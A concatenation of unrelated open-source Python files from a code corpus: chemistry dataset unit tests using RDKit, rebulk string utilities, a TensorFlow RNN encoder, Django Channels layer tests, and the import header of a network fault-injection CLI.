260543005, 'x07_c2n2o2fh3.224050.001', 'c2n2o2fh3', 224050,
1, 224050001
],
]),
df,
check_like=True)
class BondTopologyToMoleculeTest(absltest.TestCase):
def test_o2(self):
bond_topology = str_to_bond_topology("""
atoms: ATOM_O
atoms: ATOM_O
bonds {
atom_b: 1
bond_type: BOND_DOUBLE
}
""")
got = smu_utils_lib.bond_topology_to_molecule(bond_topology)
self.assertEqual('O=O', Chem.MolToSmiles(got))
def test_methane(self):
bond_topology = str_to_bond_topology("""
atoms: ATOM_C
atoms: ATOM_H
atoms: ATOM_H
atoms: ATOM_H
atoms: ATOM_H
bonds {
atom_b: 1
bond_type: BOND_SINGLE
}
bonds {
atom_b: 2
bond_type: BOND_SINGLE
}
bonds {
atom_b: 3
bond_type: BOND_SINGLE
}
bonds {
atom_b: 4
bond_type: BOND_SINGLE
}
""")
got = smu_utils_lib.bond_topology_to_molecule(bond_topology)
self.assertEqual('[H]C([H])([H])[H]', Chem.MolToSmiles(got))
# This molecule is an N+ central atom, bonded to C (triply), O-, and F
def test_charged_molecule(self):
bond_topology = str_to_bond_topology("""
atoms: ATOM_C
atoms: ATOM_NPOS
atoms: ATOM_ONEG
atoms: ATOM_F
bonds {
atom_b: 1
bond_type: BOND_TRIPLE
}
bonds {
atom_a: 1
atom_b: 2
bond_type: BOND_SINGLE
}
bonds {
atom_a: 1
atom_b: 3
bond_type: BOND_SINGLE
}
""")
got = smu_utils_lib.bond_topology_to_molecule(bond_topology)
self.assertEqual('C#[N+]([O-])F', Chem.MolToSmiles(got))
class ConformerToMoleculeTest(absltest.TestCase):
def setUp(self):
super().setUp()
self.conformer = get_stage2_conformer()
# We'll make a new initial_geometry which is just the current one with all
# coordinates multiplied by 1000
self.conformer.initial_geometries.append(
self.conformer.initial_geometries[0])
new_geom = self.conformer.initial_geometries[1]
for atom_pos in new_geom.atom_positions:
atom_pos.x = atom_pos.x * 1000
atom_pos.y = atom_pos.y * 1000
atom_pos.z = atom_pos.z * 1000
# For the extra bond_topology, we'll just copy the existing one and change
# the id. Through the dumb luck of the molecule we picked there's not a
# simple way to make this a new bond topology and still have it look valid
# to RDKit
self.conformer.bond_topologies.append(self.conformer.bond_topologies[0])
self.conformer.bond_topologies[1].bond_topology_id = 99999
def test_all_outputs(self):
mols = list(smu_utils_lib.conformer_to_molecules(self.conformer))
self.assertLen(mols, 6) # 2 bond topologies * (1 opt geom + 2 init_geom)
self.assertEqual([m.GetProp('_Name') for m in mols], [
'SMU 618451001 bt=618451(0/2) geom=init(0/2)',
'SMU 618451001 bt=618451(0/2) geom=init(1/2)',
'SMU 618451001 bt=618451(0/2) geom=opt',
'SMU 618451001 bt=99999(1/2) geom=init(0/2)',
'SMU 618451001 bt=99999(1/2) geom=init(1/2)',
'SMU 618451001 bt=99999(1/2) geom=opt'
])
self.assertEqual(
'[H]C(F)=C(OC([H])([H])[H])OC([H])([H])[H]',
Chem.MolToSmiles(mols[0], kekuleSmiles=True, isomericSmiles=False))
self.assertEqual(
'[H]C(F)=C(OC([H])([H])[H])OC([H])([H])[H]',
Chem.MolToSmiles(mols[4], kekuleSmiles=True, isomericSmiles=False))
def test_initial_only(self):
mols = list(
smu_utils_lib.conformer_to_molecules(
self.conformer,
include_initial_geometries=True,
include_optimized_geometry=False,
include_all_bond_topologies=False))
self.assertLen(mols, 2)
self.assertEqual([m.GetProp('_Name') for m in mols], [
'SMU 618451001 bt=618451(0/2) geom=init(0/2)',
'SMU 618451001 bt=618451(0/2) geom=init(1/2)',
])
# This is just one random atom I picked from the .dat file and converted to
# angstroms instead of bohr.
self.assertEqual('C', mols[0].GetAtomWithIdx(1).GetSymbol())
np.testing.assert_allclose([0.6643, -3.470301, 3.4766],
list(mols[0].GetConformer().GetAtomPosition(1)),
atol=1e-6)
self.assertEqual('C', mols[1].GetAtomWithIdx(1).GetSymbol())
np.testing.assert_allclose([664.299998, -3470.300473, 3476.600215],
list(mols[1].GetConformer().GetAtomPosition(1)),
atol=1e-6)
def test_optimized_only(self):
mols = list(
smu_utils_lib.conformer_to_molecules(
self.conformer,
include_initial_geometries=False,
include_optimized_geometry=True,
include_all_bond_topologies=False))
self.assertLen(mols, 1)
self.assertEqual(
mols[0].GetProp('_Name'),
'SMU 618451001 bt=618451(0/2) geom=opt',
)
self.assertEqual(
'[H]C(F)=C(OC([H])([H])[H])OC([H])([H])[H]',
Chem.MolToSmiles(mols[0], kekuleSmiles=True, isomericSmiles=False))
# This is just two random atoms I picked from the .dat file and converted to
# angstroms instead of bohr.
self.assertEqual('C', mols[0].GetAtomWithIdx(1).GetSymbol())
np.testing.assert_allclose([0.540254, -3.465543, 3.456982],
list(mols[0].GetConformer().GetAtomPosition(1)),
atol=1e-6)
self.assertEqual('H', mols[0].GetAtomWithIdx(13).GetSymbol())
np.testing.assert_allclose([2.135153, -1.817366, 0.226376],
list(mols[0].GetConformer().GetAtomPosition(13)),
atol=1e-6)
class SmilesCompareTest(absltest.TestCase):
def test_string_format(self):
# for some simplicity later on, we use shorter names
self.assertEqual('MISSING', str(smu_utils_lib.SmilesCompareResult.MISSING))
self.assertEqual('MISMATCH',
str(smu_utils_lib.SmilesCompareResult.MISMATCH))
self.assertEqual('MATCH', str(smu_utils_lib.SmilesCompareResult.MATCH))
def test_missing(self):
bond_topology = str_to_bond_topology("""
atoms: ATOM_O
atoms: ATOM_O
bonds {
atom_b: 1
bond_type: BOND_DOUBLE
}
""")
result, with_h, without_h = smu_utils_lib.bond_topology_smiles_comparison(
bond_topology)
self.assertEqual(smu_utils_lib.SmilesCompareResult.MISSING, result)
self.assertEqual('O=O', with_h)
self.assertEqual('O=O', without_h)
# Also directly test compute_smiles_for_bond_topology
self.assertEqual(
'O=O',
smu_utils_lib.compute_smiles_for_bond_topology(
bond_topology, include_hs=True))
def test_mismatch(self):
bond_topology = str_to_bond_topology("""
atoms: ATOM_O
atoms: ATOM_O
bonds {
atom_b: 1
bond_type: BOND_DOUBLE
}
smiles: "BlahBlahBlah"
""")
result, with_h, without_h = smu_utils_lib.bond_topology_smiles_comparison(
bond_topology)
self.assertEqual(smu_utils_lib.SmilesCompareResult.MISMATCH, result)
self.assertEqual('O=O', with_h)
self.assertEqual('O=O', without_h)
def test_matched_and_h_stripping(self):
bond_topology = str_to_bond_topology("""
atoms: ATOM_O
atoms: ATOM_H
atoms: ATOM_H
bonds {
atom_b: 1
bond_type: BOND_SINGLE
}
bonds {
atom_b: 2
bond_type: BOND_SINGLE
}
smiles: "O"
""")
result, with_h, without_h = smu_utils_lib.bond_topology_smiles_comparison(
bond_topology)
self.assertEqual(smu_utils_lib.SmilesCompareResult.MATCH, result)
self.assertEqual('[H]O[H]', with_h)
self.assertEqual('O', without_h)
# Also directly test compute_smiles_for_bond_topology
self.assertEqual(
'[H]O[H]',
smu_utils_lib.compute_smiles_for_bond_topology(
bond_topology, include_hs=True))
self.assertEqual(
'O',
smu_utils_lib.compute_smiles_for_bond_topology(
bond_topology, include_hs=False))
def test_compute_smiles_from_molecule_no_hs(self):
mol = Chem.MolFromSmiles('FOC', sanitize=False)
self.assertEqual(
smu_utils_lib.compute_smiles_for_molecule(mol, include_hs=False), 'COF')
# This is expected. Even with include_hs=True, if there were no Hs in the
# molecule, they will not be in the smiles.
self.assertEqual(
smu_utils_lib.compute_smiles_for_molecule(mol, include_hs=True), 'COF')
def test_compute_smiles_from_molecule_with_hs(self):
mol = Chem.MolFromSmiles('FOC', sanitize=False)
Chem.SanitizeMol(mol, Chem.rdmolops.SanitizeFlags.SANITIZE_ADJUSTHS)
mol = Chem.AddHs(mol)
self.assertEqual(
smu_utils_lib.compute_smiles_for_molecule(mol, include_hs=False), 'COF')
self.assertEqual(
smu_utils_lib.compute_smiles_for_molecule(mol, include_hs=True),
'[H]C([H])([H])OF')
def test_compute_smiles_from_molecule_special_case(self):
mol = Chem.MolFromSmiles('C12=C3C4=C1C4=C23', sanitize=False)
# Double check that this really is the special case -- we get back the
# SMILES we put in even though it's not the one we want.
self.assertEqual('C12=C3C4=C1C4=C23',
Chem.MolToSmiles(mol, kekuleSmiles=True))
self.assertEqual(
smu_utils_lib.compute_smiles_for_molecule(mol, include_hs=False),
'C12=C3C1=C1C2=C31')
def test_compute_smiles_from_molecule_labeled_with_h(self):
mol = Chem.MolFromSmiles(
'[O-][N+]([H])([H])N([H])OC([H])([H])F', sanitize=False)
self.assertIsNotNone(mol)
self.assertEqual(
'[O-][N+:1]([H:2])([H:3])[N:4]([H:5])[O:6][C:7]([H:8])([H:9])[F:10]',
smu_utils_lib.compute_smiles_for_molecule(
mol, include_hs=True, labeled_atoms=True))
def test_compute_smiles_from_molecule_labeled_no_h(self):
mol = Chem.MolFromSmiles(
'[O-][N+]([H])([H])N([H])OC([H])([H])F', sanitize=False)
self.assertIsNotNone(mol)
self.assertEqual(
'[O-][NH2+:1][NH:2][O:3][CH2:4][F:5]',
smu_utils_lib.compute_smiles_for_molecule(
mol, include_hs=False, labeled_atoms=True))
class MergeConformersTest(absltest.TestCase):
def setUp(self):
super().setUp()
# We are relying on the fact that the first conformer in both x07_sample.dat
# and x07_stage1.dat are the same.
self.stage1_conformer = get_stage1_conformer()
self.stage2_conformer = get_stage2_conformer()
self.duplicate_conformer = dataset_pb2.Conformer()
self.duplicate_conformer.conformer_id = self.stage1_conformer.conformer_id
# A real duplicate conformer wouldn't have both of these fields filled in,
# but it's fine for the test to make sure everything is copied.
self.duplicate_conformer.duplicated_by = 123
self.duplicate_conformer.duplicate_of.extend([111, 222])
def test_two_stage2(self):
with self.assertRaises(ValueError):
smu_utils_lib.merge_conformer(self.stage2_conformer,
self.stage2_conformer)
def test_two_stage1(self):
with self.assertRaises(ValueError):
smu_utils_lib.merge_conformer(self.stage1_conformer,
self.stage1_conformer)
def test_two_duplicates(self):
duplicate_conformer2 = copy.deepcopy(self.duplicate_conformer)
duplicate_conformer2.duplicate_of[:] = [333, 444]
got_conf, got_conflict = smu_utils_lib.merge_conformer(
self.duplicate_conformer, duplicate_conformer2)
self.assertIsNone(got_conflict)
self.assertEqual(123, got_conf.duplicated_by)
self.assertCountEqual([111, 222, 333, 444], got_conf.duplicate_of)
def test_stage2_stage1(self):
# Add a duplicate to stage1 to make sure it is copied
self.stage1_conformer.duplicate_of.append(999)
got_conf, got_conflict = smu_utils_lib.merge_conformer(
self.stage2_conformer, self.stage1_conformer)
self.assertIsNone(got_conflict)
self.assertEqual(got_conf.duplicate_of, [999])
# Just check a random field that is in stage2 but not stage1
self.assertNotEmpty(got_conf.properties.normal_modes)
def test_stage2_stage1_conflict_energy(self):
self.stage2_conformer.properties.initial_geometry_energy.value = -1.23
got_conf, got_conflict = smu_utils_lib.merge_conformer(
self.stage2_conformer, self.stage1_conformer)
self.assertEqual(got_conflict, [
618451001, 1, 1, 1, 1, -406.51179, 0.052254, -406.522079, 2.5e-05, True,
True, 1, 1, 1, 1, -1.23, 0.052254, -406.522079, 2.5e-05, True, True
])
# Just check a random field that is in stage2 but not stage1
self.assertNotEmpty(got_conf.properties.normal_modes)
# This stage2 values should be returned
self.assertEqual(got_conf.properties.initial_geometry_energy.value, -1.23)
def test_stage2_stage1_conflict_missing_geometry(self):
self.stage2_conformer.ClearField('optimized_geometry')
got_conf, got_conflict = smu_utils_lib.merge_conformer(
self.stage2_conformer, self.stage1_conformer)
self.assertEqual(got_conflict, [
618451001, 1, 1, 1, 1, -406.51179, 0.052254, -406.522079, 2.5e-05, True,
True, 1, 1, 1, 1, -406.51179, 0.052254, -406.522079, 2.5e-05, True,
False
])
# Just check a random field that is in stage2 but not stage1
self.assertNotEmpty(got_conf.properties.normal_modes)
def test_stage2_stage1_no_conflict_minus1(self):
# If stage2 contains a -1, we keep that (stricter error checking later on)
self.stage2_conformer.properties.initial_geometry_energy.value = -1.0
got_conf, got_conflict = smu_utils_lib.merge_conformer(
self.stage2_conformer, self.stage1_conformer)
self.assertIsNone(got_conflict)
self.assertEqual(got_conf.properties.initial_geometry_energy.value, -1.0)
def test_stage2_stage1_no_conflict_approx_equal(self):
self.stage2_conformer.properties.initial_geometry_energy.value += 1e-7
got_conf, got_conflict = smu_utils_lib.merge_conformer(
self.stage2_conformer, self.stage1_conformer)
self.assertIsNone(got_conflict)
# Just check a random field from stage2
self.assertNotEmpty(got_conf.properties.normal_modes)
def test_stage2_duplicate(self):
got_conf, got_conflict = smu_utils_lib.merge_conformer(
self.stage2_conformer, self.duplicate_conformer)
self.assertIsNone(got_conflict)
self.assertEqual(got_conf.duplicate_of, [111, 222])
self.assertEqual(got_conf.duplicated_by, 123)
# Just check a random field from stage2
self.assertNotEmpty(got_conf.properties.normal_modes)
def test_stage1_duplicate(self):
got_conf, got_conflict = smu_utils_lib.merge_conformer(
self.stage1_conformer, self.duplicate_conformer)
self.assertIsNone(got_conflict)
self.assertEqual(got_conf.duplicate_of, [111, 222])
self.assertEqual(got_conf.duplicated_by, 123)
# Just check a random field from stage1
self.assertTrue(got_conf.properties.HasField('initial_geometry_energy'))
def test_multiple_initial_geometries(self):
bad_conformer = copy.deepcopy(self.stage1_conformer)
bad_conformer.initial_geometries.append(bad_conformer.initial_geometries[0])
with self.assertRaises(ValueError):
smu_utils_lib.merge_conformer(bad_conformer, self.stage2_conformer)
with self.assertRaises(ValueError):
smu_utils_lib.merge_conformer(self.stage2_conformer, bad_conformer)
def test_multiple_bond_topologies(self):
bad_conformer = copy.deepcopy(self.stage1_conformer)
bad_conformer.bond_topologies.append(bad_conformer.bond_topologies[0])
with self.assertRaises(ValueError):
smu_utils_lib.merge_conformer(bad_conformer, self.stage2_conformer)
with self.assertRaises(ValueError):
smu_utils_lib.merge_conformer(self.stage2_conformer, bad_conformer)
def test_different_bond_topologies(self):
self.stage1_conformer.bond_topologies[0].atoms[0] = (
dataset_pb2.BondTopology.ATOM_H)
with self.assertRaises(ValueError):
smu_utils_lib.merge_conformer(self.stage1_conformer,
self.stage2_conformer)
with self.assertRaises(ValueError):
smu_utils_lib.merge_conformer(self.stage2_conformer,
self.stage1_conformer)
class ConformerErrorTest(absltest.TestCase):
def test_stage1_no_error(self):
conformer = get_stage1_conformer()
self.assertEqual(0,
smu_utils_lib.conformer_calculation_error_level(conformer))
def test_stage1_error(self):
conformer = get_stage1_conformer()
conformer.properties.errors.error_frequencies = 123
self.assertEqual(5,
smu_utils_lib.conformer_calculation_error_level(conformer))
def test_stage2_no_error(self):
conformer = get_stage2_conformer()
self.assertEqual(0,
smu_utils_lib.conformer_calculation_error_level(conformer))
def test_stage2_error_status_5(self):
conformer = get_stage2_conformer()
conformer.properties.errors.status = 256
self.assertEqual(5,
smu_utils_lib.conformer_calculation_error_level(conformer))
def test_stage2_error_status_4(self):
conformer = get_stage2_conformer()
conformer.properties.errors.status = 50
self.assertEqual(4,
smu_utils_lib.conformer_calculation_error_level(conformer))
def test_stage2_error_status_3(self):
conformer = get_stage2_conformer()
conformer.properties.errors.status = 4
self.assertEqual(3,
smu_utils_lib.conformer_calculation_error_level(conformer))
def test_stage2_error_level_2(self):
conformer = get_stage2_conformer()
conformer.properties.errors.warn_t1_excess = 3
self.assertEqual(2,
smu_utils_lib.conformer_calculation_error_level(conformer))
def test_stage2_error_level_1(self):
conformer = get_stage2_conformer()
conformer.properties.errors.warn_vib_linearity = 1
self.assertEqual(1,
smu_utils_lib.conformer_calculation_error_level(conformer))
class FilterConformerByAvailabilityTest(absltest.TestCase):
def setUp(self):
super().setUp()
self.conformer = dataset_pb2.Conformer()
properties = self.conformer.properties
# A STANDARD field
properties.initial_geometry_energy.value = 1.23
# A COMPLETE field
properties.zpe_unscaled.value = 1.23
# An INTERNAL_ONLY field
properties.compute_cluster_info = 'not set'
def test_standard(self):
smu_utils_lib.filter_conformer_by_availability(self.conformer,
[dataset_pb2.STANDARD])
self.assertTrue(
self.conformer.properties.HasField('initial_geometry_energy'))
self.assertFalse(self.conformer.properties.HasField('zpe_unscaled'))
self.assertFalse(self.conformer.properties.HasField('compute_cluster_info'))
def test_complete_and_internal_only(self):
smu_utils_lib.filter_conformer_by_availability(
self.conformer, [dataset_pb2.COMPLETE, dataset_pb2.INTERNAL_ONLY])
self.assertFalse(
self.conformer.properties.HasField('initial_geometry_energy'))
self.assertTrue(self.conformer.properties.HasField('zpe_unscaled'))
self.assertTrue(self.conformer.properties.HasField('compute_cluster_info'))
class ConformerToStandardTest(absltest.TestCase):
def setUp(self):
super().setUp()
self.conformer = get_stage2_conformer()
def test_field_filtering(self):
# Check that the field which should be filtered starts out set
self.assertTrue(
self.conformer.properties.HasField('optimized_geometry_energy'))
got = smu_utils_lib.conformer_to_standard(self.conformer)
# Check for a field that was originally in self.conformer and should be
# filtered and a field which should still be present.
self.assertTrue(got.properties.HasField('optimized_geometry_energy'))
self.assertFalse(got.properties.HasField('zpe_unscaled'))
def test_remove_error_conformer(self):
self.conformer.properties.errors.status = 256
self.assertIsNone(smu_utils_lib.conformer_to_standard(self.conformer))
def test_remove_duplicate(self):
self.conformer.duplicated_by = 123
self.assertIsNone(smu_utils_lib.conformer_to_standard(self.conformer))
class DetermineFateTest(parameterized.TestCase):
def test_duplicate_same_topology(self):
conformer = get_stage1_conformer()
# bond topology is conformer_id // 1000
conformer.duplicated_by = conformer.conformer_id + 1
self.assertEqual(dataset_pb2.Conformer.FATE_DUPLICATE_SAME_TOPOLOGY,
smu_utils_lib.determine_fate(conformer))
def test_duplicate_different_topology(self):
conformer = get_stage1_conformer()
# bond topology is conformer_id // 1000
conformer.duplicated_by = conformer.conformer_id + 1000
self.assertEqual(dataset_pb2.Conformer.FATE_DUPLICATE_DIFFERENT_TOPOLOGY,
smu_utils_lib.determine_fate(conformer))
@parameterized.parameters(
(2, dataset_pb2.Conformer.FATE_GEOMETRY_OPTIMIZATION_PROBLEM),
(5, dataset_pb2.Conformer.FATE_DISASSOCIATED),
(4, dataset_pb2.Conformer.FATE_FORCE_CONSTANT_FAILURE),
(6, dataset_pb2.Conformer.FATE_DISCARDED_OTHER))
def test_geometry_failures(self, nstat1, expected_fate):
conformer = get_stage1_conformer()
conformer.properties.errors.error_nstat1 = nstat1
self.assertEqual(expected_fate, smu_utils_lib.determine_fate(conformer))
def test_no_result(self):
conformer = get_stage1_conformer()
self.assertEqual(dataset_pb2.Conformer.FATE_NO_CALCULATION_RESULTS,
smu_utils_lib.determine_fate(conformer))
@parameterized.parameters(
(256, dataset_pb2.Conformer.FATE_CALCULATION_WITH_SERIOUS_ERROR),
(50, dataset_pb2.Conformer.FATE_CALCULATION_WITH_MAJOR_ERROR),
(4, dataset_pb2.Conformer.FATE_CALCULATION_WITH_MODERATE_ERROR))
def test_calculation_errors(self, status, expected):
conformer = get_stage2_conformer()
conformer.properties.errors.status = status
self.assertEqual(expected, smu_utils_lib.determine_fate(conformer))
def test_calculation_warnings_serious(self):
conformer = get_stage2_conformer()
conformer.properties.errors.warn_t1_excess = 1234
self.assertEqual(
dataset_pb2.Conformer.FATE_CALCULATION_WITH_WARNING_SERIOUS,
smu_utils_lib.determine_fate(conformer))
def test_calculation_warnings_vibrational(self):
conformer = get_stage2_conformer()
conformer.properties.errors.warn_vib_linearity = 1234
self.assertEqual(
dataset_pb2.Conformer.FATE_CALCULATION_WITH_WARNING_VIBRATIONAL,
smu_utils_lib.determine_fate(conformer))
def test_success(self):
conformer = get_stage2_conformer()
self.assertEqual(dataset_pb2.Conformer.FATE_SUCCESS,
smu_utils_lib.determine_fate(conformer))
class ToBondTopologySummaryTest(absltest.TestCase):
def setUp(self):
super().setUp()
self.conformer = get_stage2_conformer()
def test_dup_same(self):
self.conformer.fate = dataset_pb2.Conformer.FATE_DUPLICATE_SAME_TOPOLOGY
got = list(
smu_utils_lib.conformer_to_bond_topology_summaries(self.conformer))
self.assertLen(got, 1)
self.assertEqual(got[0].bond_topology.bond_topology_id,
self.conformer.bond_topologies[0].bond_topology_id)
self.assertEqual(got[0].count_attempted_conformers, 1)
self.assertEqual(got[0].count_duplicates_same_topology, 1)
def test_dup_diff(self):
self.conformer.fate = (
dataset_pb2.Conformer.FATE_DUPLICATE_DIFFERENT_TOPOLOGY)
got = list(
smu_utils_lib.conformer_to_bond_topology_summaries(self.conformer))
self.assertLen(got, 1)
self.assertEqual(got[0].count_attempted_conformers, 1)
self.assertEqual(got[0].count_duplicates_different_topology, 1)
def test_geometry_failed(self):
self.conformer.fate = (dataset_pb2.Conformer.FATE_DISCARDED_OTHER)
got = list(
smu_utils_lib.conformer_to_bond_topology_summaries(self.conformer))
self.assertLen(got, 1)
self.assertEqual(got[0].count_attempted_conformers, 1)
self.assertEqual(got[0].count_failed_geometry_optimization, 1)
def test_missing_calculation(self):
self.conformer.fate = dataset_pb2.Conformer.FATE_NO_CALCULATION_RESULTS
got = list(
smu_utils_lib.conformer_to_bond_topology_summaries(self.conformer))
self.assertLen(got, 1)
self.assertEqual(got[0].count_attempted_conformers, 1)
self.assertEqual(got[0].count_kept_geometry, 1)
self.assertEqual(got[0].count_missing_calculation, 1)
def test_calculation_with_error(self):
self.conformer.fate = (
dataset_pb2.Conformer.FATE_CALCULATION_WITH_SERIOUS_ERROR)
self.conformer.bond_topologies.append(self.conformer.bond_topologies[0])
self.conformer.bond_topologies[-1].bond_topology_id = 123
got = list(
smu_utils_lib.conformer_to_bond_topology_summaries(self.conformer))
self.assertLen(got, 2)
# We don't actually care about the order, but this is what comes out right
# now.
self.assertEqual(got[0].bond_topology.bond_topology_id, 123)
self.assertEqual(got[0].count_attempted_conformers, 0)
self.assertEqual(got[0].count_kept_geometry, 0)
self.assertEqual(got[0].count_calculation_with_error, 0)
self.assertEqual(got[0].count_detected_match_with_error, 1)
self.assertEqual(got[1].bond_topology.bond_topology_id,
self.conformer.bond_topologies[0].bond_topology_id)
self.assertEqual(got[1].count_attempted_conformers, 1)
self.assertEqual(got[1].count_kept_geometry, 1)
self.assertEqual(got[1].count_calculation_with_error, 1)
self.assertEqual(got[1].count_detected_match_with_error, 0)
def test_calculation_success(self):
self.conformer.fate = dataset_pb2.Conformer.FATE_SUCCESS
self.conformer.bond_topologies.append(self.conformer.bond_topologies[0])
self.conformer.bond_topologies[-1].bond_topology_id = 123
got = list(
smu_utils_lib.conformer_to_bond_topology_summaries(self.conformer))
self.assertLen(got, 2)
# We don't actually care about the order, but this is what comes out right
# now.
self.assertEqual(got[0].bond_topology.bond_topology_id, 123)
self.assertEqual(got[0].count_attempted_conformers, 0)
self.assertEqual(got[0].count_kept_geometry, 0)
self.assertEqual(got[0].count_calculation_success, 0)
self.assertEqual(got[0].count_detected_match_success, 1)
self.assertEqual(got[1].bond_topology.bond_topology_id,
self.conformer.bond_topologies[0].bond_topology_id)
self.assertEqual(got[1].count_attempted_conformers, 1)
self.assertEqual(got[1].count_kept_geometry, 1)
self.assertEqual(got[1].count_calculation_success, 1)
self.assertEqual(got[1].count_detected_match_success, 0)
class LabeledSmilesTester(absltest.TestCase):
def test_atom_labels(self):
mol = Chem.MolFromSmiles('FCON[NH2+][O-]', sanitize=False)
self.assertIsNotNone(mol)
smiles_before = Chem.MolToSmiles(mol)
self.assertEqual(
smu_utils_lib.labeled_smiles(mol), 'F[CH2:1][O:2][NH:3][NH2+:4][O-:5]')
# Testing both the atom numbers and the smiles is redundant,
# but guards against possible future changes.
for atom in mol.GetAtoms():
self.assertEqual(atom.GetAtomMapNum(), 0)
self.assertEqual(Chem.MolToSmiles(mol), smiles_before)
if __name__ == '__main__':
absltest.main()
|
Contents/Libraries/Shared/rebulk/utils.py
|
jippo015/Sub-Zero.bundle
| 1,553 |
84993
|
<gh_stars>1000+
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Various utilities functions
"""
from collections import MutableSet
from types import GeneratorType
def find_all(string, sub, start=None, end=None, ignore_case=False, **kwargs):
"""
Return all indices in string s where substring sub is
found, such that sub is contained in the slice s[start:end].
>>> list(find_all('The quick brown fox jumps over the lazy dog', 'fox'))
[16]
>>> list(find_all('The quick brown fox jumps over the lazy dog', 'mountain'))
[]
>>> list(find_all('The quick brown fox jumps over the lazy dog', 'The'))
[0]
>>> list(find_all(
... 'Carved symbols in a mountain hollow on the bank of an inlet irritated an eccentric person',
... 'an'))
[44, 51, 70]
>>> list(find_all(
... 'Carved symbols in a mountain hollow on the bank of an inlet irritated an eccentric person',
... 'an',
... 50,
... 60))
[51]
:param string: the input string
:type string: str
:param sub: the substring
:type sub: str
:return: all indices in the input string
:rtype: __generator[str]
"""
#pylint: disable=unused-argument
if ignore_case:
sub = sub.lower()
string = string.lower()
while True:
start = string.find(sub, start, end)
if start == -1:
return
yield start
start += len(sub)
def get_first_defined(data, keys, default_value=None):
"""
Get the first defined key in data.
:param data:
:type data:
:param keys:
:type keys:
:param default_value:
:type default_value:
:return:
:rtype:
"""
for key in keys:
if key in data:
return data[key]
return default_value
def is_iterable(obj):
"""
Are we being asked to look up a list of things, instead of a single thing?
We check for the `__iter__` attribute so that this can cover types that
don't have to be known by this module, such as NumPy arrays.
Strings, however, should be considered as atomic values to look up, not
iterables.
We don't need to check for the Python 2 `unicode` type, because it doesn't
have an `__iter__` attribute anyway.
"""
# pylint: disable=consider-using-ternary
return hasattr(obj, '__iter__') and not isinstance(obj, str) or isinstance(obj, GeneratorType)
def extend_safe(target, source):
"""
Extends source list to target list only if elements doesn't exists in target list.
:param target:
:type target: list
:param source:
:type source: list
"""
for elt in source:
if elt not in target:
target.append(elt)
class _Ref(object):
"""
Reference for IdentitySet
"""
def __init__(self, value):
self.value = value
def __eq__(self, other):
return self.value is other.value
def __hash__(self):
return id(self.value)
class IdentitySet(MutableSet): # pragma: no cover
"""
Set based on identity
"""
def __init__(self, items=None): # pylint: disable=super-init-not-called
if items is None:
items = []
self.refs = set(map(_Ref, items))
def __contains__(self, elem):
return _Ref(elem) in self.refs
def __iter__(self):
return (ref.value for ref in self.refs)
def __len__(self):
return len(self.refs)
def add(self, value):
self.refs.add(_Ref(value))
def discard(self, value):
self.refs.discard(_Ref(value))
def update(self, iterable):
"""
Update set with iterable
:param iterable:
:type iterable:
:return:
:rtype:
"""
for elem in iterable:
self.add(elem)
def __repr__(self): # pragma: no cover
return "%s(%s)" % (type(self).__name__, list(self))
|
modules/rnn.py
|
bckim92/sequential-knowledge-transformer
| 135 |
84998
|
<gh_stars>100-1000
import tensorflow as tf
def single_rnn_cell(units: int,
cell_type: str = "gru",
name: str = None):
if cell_type == "gru":
# Masking is not supported for CuDNN RNNs
return tf.keras.layers.GRU(
units,
return_sequences=True,
return_state=True,
name=name)
elif cell_type == "cudnn_gru":
return tf.compat.v1.keras.layers.CuDNNGRU(
units,
return_sequences=True,
return_state=True,
name=name)
elif cell_type == "gru_cell":
#return tf.keras.layers.GRUCell(
# units,
# name=name
#)
# Use this for decoder
return tf.nn.rnn_cell.GRUCell(
units,
name=name
)
else:
raise ValueError
class RnnEncoder(tf.keras.layers.Layer):
def __init__(self,
units: int,
cell_type: str = "gru",
name: str = None):
super().__init__(name=name)
self._units = units
self._cell_type = cell_type
self._name = name
def build(self, input_shape):
rnn_cell = single_rnn_cell(self._units, self._cell_type)
self.birnn_cell = tf.keras.layers.Bidirectional(rnn_cell)
super().build(input_shape)
def call(self, x, initial_state=None):
outputs, fw_state, bw_state = self.birnn_cell(x, initial_state=initial_state)
return outputs, fw_state, bw_state
def compute_output_shape(self, input_shape):
shape = tf.TensorShape(input_shape).as_list()
batch_size = shape[0]
shape[-1] = self._units * 2
return [tf.TensorShape(shape),
tf.TensorShape([batch_size, self._units]),
tf.TensorShape([batch_size, self._units])]
def get_config(self):
return {
"units": self._units,
"cell_type": self._cell_type
}
def compute_mask(self, inputs, mask):
return self.birnn_cell.compute_mask(inputs, mask)
|
tests/test_layers.py
|
MattBroach/channels
| 4,277 |
85023
|
import unittest
import pytest
from django.test import override_settings
from channels import DEFAULT_CHANNEL_LAYER
from channels.exceptions import InvalidChannelLayerError
from channels.layers import InMemoryChannelLayer, channel_layers, get_channel_layer
class TestChannelLayerManager(unittest.TestCase):
@override_settings(
CHANNEL_LAYERS={"default": {"BACKEND": "channels.layers.InMemoryChannelLayer"}}
)
def test_config_error(self):
"""
If channel layer doesn't specify TEST_CONFIG, `make_test_backend`
should result into error.
"""
with self.assertRaises(InvalidChannelLayerError):
channel_layers.make_test_backend(DEFAULT_CHANNEL_LAYER)
@override_settings(
CHANNEL_LAYERS={
"default": {
"BACKEND": "channels.layers.InMemoryChannelLayer",
"TEST_CONFIG": {"expiry": 100500},
}
}
)
def test_config_instance(self):
"""
If channel layer provides TEST_CONFIG, `make_test_backend` should
return channel layer instance appropriate for testing.
"""
layer = channel_layers.make_test_backend(DEFAULT_CHANNEL_LAYER)
self.assertEqual(layer.expiry, 100500)
def test_override_settings(self):
"""
The channel layers cache is reset when the CHANNEL_LAYERS setting
changes.
"""
with override_settings(
CHANNEL_LAYERS={
"default": {"BACKEND": "channels.layers.InMemoryChannelLayer"}
}
):
self.assertEqual(channel_layers.backends, {})
get_channel_layer()
self.assertNotEqual(channel_layers.backends, {})
self.assertEqual(channel_layers.backends, {})
# In-memory layer tests
@pytest.mark.asyncio
async def test_send_receive():
layer = InMemoryChannelLayer()
message = {"type": "test.message"}
await layer.send("test.channel", message)
assert message == await layer.receive("test.channel")
|
thirdparty/patchmatchnet/datasets/__init__.py
|
swershrimpy/gtsfm
| 122 |
85035
|
<filename>thirdparty/patchmatchnet/datasets/__init__.py
"""PatchmatchNet dataset module
reference: https://github.com/FangjinhuaWang/PatchmatchNet
"""
|
saboteur/cli.py
|
tomakehurst/saboteur
| 258 |
85042
|
<reponame>tomakehurst/saboteur
#!/usr/bin/env python
import sys
import httplib
import json
from optparse import OptionParser
import os
from os.path import expanduser
from apicommands import FAULT_TYPES
